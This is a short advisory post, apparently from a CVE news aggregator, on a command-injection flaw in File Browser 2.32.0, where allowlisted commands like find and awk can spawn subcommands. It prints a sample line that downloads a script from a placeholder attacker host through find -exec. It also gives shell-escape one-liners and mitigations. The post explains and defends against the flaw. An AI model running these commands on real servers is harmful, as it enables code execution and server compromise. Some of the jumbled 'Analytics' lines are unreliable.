Listen to this Post
How the CVE Works
File Browser restricts command execution to a predefined allowlist, but many Linux commands (e.g., find, awk, sed) allow subcommand execution via flags like -exec. Attackers with “Execute Commands” permission can bypass restrictions by injecting malicious subcommands. For example:
find . -exec curl http://evil.com/exploit.sh -o /tmp/exploit \;
This executes arbitrary code under the server’s UID. Common binaries in File Browser’s container (e.g., tar, python) exacerbate the issue.
DailyCVE Form
Platform: File Browser
Version: 2.32.0
Vulnerability: Command Injection
Severity: Critical
Date: 2025-03-26
Prediction: Patch by 2025-07-10
What Undercode Say
Analytics:
prlimit --nproc=0 find . -exec sh -c 'malicious' \; Blocks fork grep -r "allowlist" /etc/filebrowser/ Audit config
Exploit:
find / -perm -4000 -exec /bin/sh \; SUID escape
awk 'BEGIN {system("id")}' Shell via awk
Protection:
- Disable “Execute Commands” globally.
- Use `prlimit –nproc=0` for all commands.
- Migrate to distroless containers.
Impact:
- Full server compromise.
- UID privilege escalation.
- Data exfiltration.
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
